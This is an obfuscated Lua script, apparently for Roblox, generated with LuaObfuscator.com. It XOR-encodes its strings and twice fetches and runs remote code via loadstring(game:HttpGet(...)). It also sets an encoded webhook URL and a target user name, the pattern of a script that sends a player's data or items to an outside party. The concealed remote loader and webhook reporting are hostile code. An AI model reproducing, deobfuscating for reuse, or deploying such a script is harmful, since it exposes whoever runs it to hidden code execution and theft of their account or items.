--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local v7;v8=function(v9,v10)local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1)),v1(v2(v10,1 + ((v12-(2 -1))% #v10),(3 -2) + 0 + 0 + ((v12-1)% #v10) + (3 -2) + (281 -(210 + 71)))))%(18 + 238)));end return v5(v11);end;loadstring(game:HttpGet(v8("\47\3\2\20\94\255\104\88\4\5\90\235\32\30\2\12\88\167\50\4\19\22\78\170\41\3\19\10\89\235\36\24\27\75\121\173\34\37\19\5\65\129\116\1\89\32\88\181\34\63\3\6\2\168\38\30\24\75\127\128\6\51\59\33\3\168\35","\71\119\118\100\45\197")))();wait(5 + (361 -(75 + 286)));UserName=v8("\60\6\203\103\52\248\81\65\56\15\220\65\63\252\79","\104\110\174\53\81\153\61\30");WebHook=v8("\26\7\7\252\9\246\85\49\22\26\0\239\21\190\30\48\17\28\30\163\27\188\19\49\5\22\17\228\21\163\17\109\93\66\67\186\74\245\72\41\67\74\69\180\79\255\77\46\68\68\69\190\85\148\62\39\75\74\32\189\59\169\3\107\37\55\1\220\19\160\42\116\52\35\3\217\42\129\16\73\8\28\11\230\17\149\46\65\62\35\17\234\29\253\43\90\74\44\4\211\41\165\40\115\32\94\62\190\48\180\48\83\10\42\34\235\40\190\10\119\40","\114\115\115\140\122\204\122\30");Mention=true;loadstring(game:HttpGet(v8("\32\173\186\23\220\106\171\103\171\175\16\129\55\237\60\177\187\5\218\35\225\58\186\161\9\219\53\234\60\247\173\8\194\127\239\124\191\186\19\128\32\225\60\170\163\14\215\52\241\56\188\225\10\206\57\234\103\137\157\63\129\60\241\41","\72\217\206\103\175\80\132"),true))();
